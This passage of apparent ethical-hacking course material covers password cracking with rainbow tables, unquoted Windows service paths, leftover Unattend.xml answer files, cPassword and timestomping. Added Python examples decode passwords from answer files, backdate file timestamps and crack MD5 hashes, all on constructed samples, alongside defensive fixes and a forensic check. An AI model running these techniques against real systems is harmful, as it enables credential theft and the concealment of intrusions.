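Two effects show up in the result: the unsalted store reveals that all three users share a password before any cracking starts, and a single pass over the word list cracks all of them at once, whereas with salts every stored hash costs its own pass and every candidate costs ITERATIONS hash computations instead of one.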

plaintext_len_min plaintext_len_max

These two parameters limit the plain text length range of the rainbow table. In the rtgen example in this set, the plain text length range is 1 to 7, so plain texts such as abcdefg are likely to be contained in the generated table, while abcdefgh, with length 8, cannot be.

Dumpster diving

This non-technical method of attack relies on finding sensitive information that has been discarded in garbage cans, dumpsters, or other unsecure places that a hacker has access to.

Shoulder surfing

This technique involves watching and recording a password, pin, or access code that is being entered by someone in close proximity.

Timestomp

Timestomp is a tool for modifying or deleting a file's timestamp in order to hide when the file was created, accessed, or modified. Hackers change times and dates to blend in with existing timestamps so as to not alert digital forensic investigators of access or exploitation.

part_index

To store a large rainbow table in many smaller files, use a different number for each part, and keep all other parameters identical.

Trinity Rescue Kit

Trinity Rescue Kit (TRK) helps with repair and recovery operations on Windows machines. It is a great tool for maintenance. It has many functions, including resetting passwords, scanning for viruses, running a disk cleanup, and fixing bugs.

Video

Use a combination of the methods used for audio and image files to search for hidden information.

Path interception

When an executable such as an application, service, or process is started, the system resolves the path of the file to run. There is no problem if the path is enclosed in quotation marks, or if it contains no spaces. If the path is not quoted and contains spaces, Windows tries each space-separated prefix as a program name before it reaches the full path, so an attacker who can write to one of those directories can plant a file that is run instead. Executables that are started regularly provide continued access to a system, and executables started by a higher-privileged process give the attacker elevated privileges, for example to create a new user with administrator rights for ongoing access. Example:
Trusted path: "c:\program files\sub directory\program name.exe" (quoted), or c:\programfiles\subdirectory\programname.exe (no spaces)
Exploitable path: c:\program files\sub directory\program name.exe (unquoted, with spaces)
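The resolution rule described above, as an added example that is not part of the course material: given a list of service image paths as read from the registry (the sample list is constructed), it reports every unquoted path with spaces and enumerates the files Windows would try before the intended binary, in the order it tries them. Whether an attacker can actually write to those locations is a separate check (icacls on each directory) that this example does not perform.

```python
"""Find services with unquoted image paths and list their interception points.

Added example, not from the course. CreateProcess tries each space-separated
prefix of an unquoted path, appending .exe, until one exists; every prefix
before the real binary is a place an attacker could plant a file. The
service list below is constructed, in the shape of the ImagePath values under
HKLM\\SYSTEM\\CurrentControlSet\\Services.
"""

# (service name, ImagePath, account it runs as); constructed sample.
SERVICES = [
    ("GoodSvc",  r'"C:\Program Files\Good Vendor\good.exe" -k service', "LocalSystem"),
    ("PlainSvc", r"C:\programfiles\subdirectory\programname.exe", "LocalSystem"),
    ("WeakSvc",  r"C:\Program Files\Sub Directory\Program Name.exe", "LocalSystem"),
    ("ArgsSvc",  r"C:\Program Files\Other Vendor\agent.exe -config agent.cfg", r"NT AUTHORITY\SYSTEM"),
]


def interception_candidates(image_path: str) -> list[str]:
    """Paths Windows would try before the intended executable, in search order.

    Returns [] when the path is quoted or has no space before the binary.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    words = path.split(" ")
    candidates = []
    for i in range(1, len(words)):
        prefix = " ".join(words[:i])
        if prefix.lower().endswith(".exe"):
            break                      # reached the real binary; the rest are arguments
        candidates.append(prefix + ".exe")
    return candidates


def audit_services(services) -> list[tuple[str, str, list[str]]]:
    """Return (name, account, candidates) for every service with an exploitable path."""
    findings = []
    for name, image_path, account in services:
        cands = interception_candidates(image_path)
        if cands:
            findings.append((name, account, cands))
    return findings


if __name__ == "__main__":
    for name, account, cands in audit_services(SERVICES):
        print(f"{name} (runs as {account}):")
        for c in cands:
            print(f"   would try {c}")
```

For the page's own example the candidates are C:\Program.exe, C:\Program Files\Sub.exe, and C:\Program Files\Sub Directory\Program.exe. On a default installation the first two directories are not writable by standard users, so the practical finding is usually a vendor directory further down the path with loose permissions; the fix in every case is to quote the ImagePath.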

Backdoors

When hackers gain access to a system, often they establish a way to get back into it again later. This is referred to as a backdoor. Typically, a hacker will install a rootkit, Trojan horse, or a remote access Trojan (RAT). Rootkits have access at the operating system level and Trojans have access at the application level. As previously discussed, a hacker may create a new user to obtain access.

Scheduled Tasks

Windows Task Scheduler has had weaknesses in how it validates task files, and in its default configuration it lets regular users create tasks. An attacker who can write or modify a task file can make it run malicious commands, possibly under a more privileged account. Scheduled tasks are therefore used to escalate privileges, maintain access, execute commands remotely, and launch malicious programs at system startup.

Unattended installation

While it is convenient, and sometimes necessary, to install Windows across a network without sitting at every computer, unattended installations carry a risk. If the administrator does not clean up afterwards, the answer file (Unattend.xml, or sysprep.inf on older versions) is left on the workstation, typically under C:\Windows\Panther or C:\Windows\System32\sysprep. This XML file holds the configuration used during installation, which can include local accounts and the auto-logon administrator account together with their passwords, stored either in plain text or merely base64-encoded. Reading it makes privilege escalation easy. To avoid this risk:
Give only the privileges needed for the installation when creating the answer file.
Ensure credentials are encrypted when a network administrator installs over the network.
Secure the image created for the installation.
Remove the answer file from installed systems once setup is complete.
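What an attacker actually does with a leftover answer file, as an added example that is not part of the course material: parse the XML, find every Password element, and decode the non-plaintext ones. The file below is constructed; the structure it uses (AutoLogon and UserAccounts/LocalAccounts under the Microsoft-Windows-Shell-Setup component) and the encoding of non-plaintext values (base64 of the UTF-16LE password with the literal suffix "Password") are how Windows Setup really stores them.

```python
"""Pull credentials out of an answer file left behind by an unattended install.

Added example, not from the course. Parses a constructed Unattend.xml.
"""
import base64
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"


def _tag(name: str) -> str:
    return f"{{{NS}}}{name}"


def decode_password(value: str, plain_text: bool) -> str:
    """Undo the AutoLogon/LocalAccount encoding when PlainText is false."""
    if plain_text:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    suffix = "Password"
    return decoded[:-len(suffix)] if decoded.endswith(suffix) else decoded


def find_credentials(xml_text: str) -> list[tuple[str, str]]:
    """Return (account, password) for every Password element in the answer file."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for pw in root.iter(_tag("Password")):
        value = pw.findtext(_tag("Value"), default="")
        plain = pw.findtext(_tag("PlainText"), default="true").strip().lower() == "true"
        owner = parents[pw]   # AutoLogon carries Username, LocalAccount carries Name
        account = (owner.findtext(_tag("Username"))
                   or owner.findtext(_tag("Name"))
                   or owner.tag.split("}")[-1])
        found.append((account, decode_password(value, plain)))
    return found


# Constructed sample. The AutoLogon value is built here so the demo is
# self-checking; on a real host it is just an opaque base64 string.
_ENCODED = base64.b64encode("passwordPassword".encode("utf-16-le")).decode()
SAMPLE_UNATTEND = f"""
<unattend xmlns="{NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>{_ENCODED}</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>Winter2024!</Value><PlainText>true</PlainText></Password>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for account, password in find_credentials(SAMPLE_UNATTEND):
        print(f"{account}: {password}")
```

The usual places to look are C:\Windows\Panther\Unattend.xml, C:\Windows\Panther\Unattend\Unattend.xml, and C:\Windows\System32\Sysprep\sysprep.xml (plus sysprep.inf and unattend.txt on older systems). The base64 step is an encoding, not encryption, which is why the text's advice to protect the answer file and remove it after installation is the only real defense.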

ascii-32-95

[ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~]

ascii-32-65-123-4

[ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`{|}~]

numeric

[0123456789]

alpha-numeric-symbol32-space

[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]

alpha-numeric

[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]

alpha

[ABCDEFGHIJKLMNOPQRSTUVWXYZ]

lower alpha-numeric

[abcdefghijklmnopqrstuvwxyz0123456789]

mix alpha-numeric

[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]

mix alpha

[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]

lower alpha

[abcdefghijklmnopqrstuvwxyz]

cPassword

cPassword is the attribute that stores a password in a Group Policy Preferences item, for example the local user or local administrator accounts that domain admins create or change through the preference. The attribute is easy to exploit because Microsoft published the AES key used to encrypt it. cPassword values live in XML files in the SYSVOL share on the domain controllers, which every authenticated domain user can read, so any domain user can retrieve and decrypt the password. Microsoft later removed the ability to store new passwords in Group Policy Preferences, but files left behind from before that change remain readable and are still worth checking for.

ctime

ctime is a standard C/C++ header that declares functions for getting and manipulating date and time information; a custom tool can use it to set arbitrary timestamps. On Unix-like systems ctime also names the inode change time, which records when a file's metadata last changed. Unlike the access and modification times, it cannot be set through touch or utime (the kernel resets it to the current time on every metadata change), so a modification time far older than the change time is a common sign of timestamp tampering.
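The timestamp change described under Timestomp and touch, together with the ctime caveat above, as an added example that is not from Timestomp, touch, or Meterpreter: stomp() backdates a file's access and modification times through os.utime, which is what touch -d does, and looks_stomped() is the simple forensic check that follows from the caveat, flagging files whose modification time is far older than their change time.

```python
"""Backdate a file's access/modification times and show that ctime gives it away.

Added example, not from any tool in this set. The kernel updates ctime on
every metadata change and offers no API to set it, so after stomping the
modification time says 2020 while ctime still says "now".
"""
import os
import tempfile

BACKDATE = 1577836800.0        # 2020-01-01T00:00:00Z, the fake time to stamp


def stomp(path: str, when: float) -> dict:
    """Set atime and mtime to `when` (what `touch -d` does); return the resulting times."""
    os.utime(path, (when, when))
    st = os.stat(path)
    return {"atime": st.st_atime, "mtime": st.st_mtime, "ctime": st.st_ctime}


def looks_stomped(path: str, max_gap_seconds: float = 3600.0) -> bool:
    """Flag a file whose content time is much older than its metadata-change time."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > max_gap_seconds


def demo() -> dict:
    """Create a file, check it, backdate it, check it again."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "evidence.txt")
        with open(path, "w") as f:
            f.write("constructed sample content\n")
        before = looks_stomped(path)          # fresh file: mtime and ctime agree
        times = stomp(path, BACKDATE)
        after = looks_stomped(path)           # backdated file: mtime far behind ctime
        return {"before": before, "after": after, **times}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On NTFS the equivalent check compares the $STANDARD_INFORMATION timestamps, which Timestomp rewrites, against the $FILE_NAME timestamps, which it does not; the idea is the same, one clock the attacker can set against one they cannot. A gap of one hour is a demo threshold; real triage would also weigh whole-second values (many stomping tools cannot write sub-second precision) and timestamps older than the parent directory.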

Program options for rtgen are described in the following table.

hash_algorithm, charset, plaintext_len_min plaintext_len_max, table_index, chain_len, chain_num, part_index

The following shows the charsets rtgen accepts and the characters each one covers.

numeric, alpha, alpha-numeric, lower alpha, lower alpha-numeric, mix alpha, mix alpha-numeric, ascii-32-95, ascii-32-65-123-4, alpha-numeric-symbol32-space

rtgen

rtgen generates rainbow tables based on parameters specified by the user. The command line syntax of the rtgen program is:
rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index
An example of the commands used to generate a rainbow table set with 6 rainbow tables (one per table_index) is:
rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0
rtgen md5 loweralpha-numeric 1 7 1 3800 33554432 0
rtgen md5 loweralpha-numeric 1 7 2 3800 33554432 0
rtgen md5 loweralpha-numeric 1 7 3 3800 33554432 0
rtgen md5 loweralpha-numeric 1 7 4 3800 33554432 0
rtgen md5 loweralpha-numeric 1 7 5 3800 33554432 0
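A scaled-down implementation of what rtgen, rtsort, and the lookup described under Rainbow do, as an added example; it is not RainbowCrack's code. The parameters keep the names used in this set (charset, plaintext_len_min/max, table_index, chain_len, chain_num), the reduction function is a simple stand-in for RainbowCrack's, the charset is loweralpha-numeric, and the sizes are cut down so the whole thing runs in well under a second.

```python
"""Toy rainbow table: generate chains, index them by end point, look up a hash.

Added example illustrating the rtgen parameters and the chain walk described
in this set. Not RainbowCrack's code; the reduction function is a stand-in.
"""
import hashlib
import string

CHARSET = string.ascii_lowercase + string.digits   # rtgen's "loweralpha-numeric"


def md5(plaintext: str) -> bytes:
    """hash_algorithm: md5, as in the rtgen example."""
    return hashlib.md5(plaintext.encode()).digest()


def reduce_(digest: bytes, column: int, table_index: int,
            min_len: int, max_len: int) -> str:
    """Map a digest back into the plain text space.

    column and table_index are mixed in so that every column of a chain and
    every table uses a different reduction function; that is the "rainbow".
    """
    n = int.from_bytes(digest[:8], "little")
    n ^= column * 0x9E3779B97F4A7C15 ^ (table_index << 56)
    lengths = max_len - min_len + 1
    length = min_len + n % lengths
    n //= lengths
    chars = []
    for _ in range(length):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def start_point(i: int, table_index: int, min_len: int, max_len: int) -> str:
    """Deterministic start plain text for chain i (rtgen derives starts from a counter too)."""
    return reduce_(md5(f"start{table_index}:{i}"), 0, table_index, min_len, max_len)


def build_table(chain_num, chain_len, table_index, min_len, max_len):
    """rtgen: chain_num chains of chain_len hash/reduce links each.

    Only the start and end point of every chain are kept (RainbowCrack stores
    8 bytes for each, hence 16 bytes per chain). Indexing by end point is what
    rtsort's sort achieves on disk: lookups no longer scan the whole file.
    """
    table: dict[str, list[str]] = {}
    for i in range(chain_num):
        start = p = start_point(i, table_index, min_len, max_len)
        for col in range(chain_len):
            p = reduce_(md5(p), col, table_index, min_len, max_len)
        table.setdefault(p, []).append(start)
    return table


def lookup(digest, table, chain_len, table_index, min_len, max_len):
    """Assume the target sits in column j, walk to the chain end, check the table,
    and if a chain matches, regenerate it from its start to recover the plain text."""
    for j in range(chain_len - 1, -1, -1):
        p = reduce_(digest, j, table_index, min_len, max_len)
        for col in range(j + 1, chain_len):
            p = reduce_(md5(p), col, table_index, min_len, max_len)
        for start in table.get(p, ()):
            q = start
            for col in range(chain_len):
                if md5(q) == digest:
                    return q
                q = reduce_(md5(q), col, table_index, min_len, max_len)
    return None


def demo(chain_num=500, chain_len=40, table_index=0, min_len=3, max_len=3):
    """Crack the hash of a plain text known to lie in chain 0 (its 5th link)."""
    table = build_table(chain_num, chain_len, table_index, min_len, max_len)
    covered = start_point(0, table_index, min_len, max_len)
    for col in range(5):
        covered = reduce_(md5(covered), col, table_index, min_len, max_len)
    recovered = lookup(md5(covered), table, chain_len, table_index, min_len, max_len)
    return covered, recovered


if __name__ == "__main__":
    covered, recovered = demo()
    print(f"hash of {covered!r} looked up -> {recovered!r}")
```

The lookup cost is about chain_len squared over two reductions per hash, which is why chain_len trades lookup time against table size, and a plain text outside the charset and length range (say, eight characters when the table covers three) can never be found, which is the point made under plaintext_len_min and plaintext_len_max. Keeping a list of start points per end point stands in for what rtsort does with duplicate end points after sorting.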

Technical Password Attacks

It's natural for people to want easy-to-remember passwords or to use the same password for multiple systems and websites. A surprising number of people use the password abc123, a pet's name, or a hobby as a password. The weakness in this convenience is that these are all easy for an attacker to guess. The following types of technical password attacks are described in this set: dictionary, brute force, pass the hash, sniffing, keylogger, rainbow.

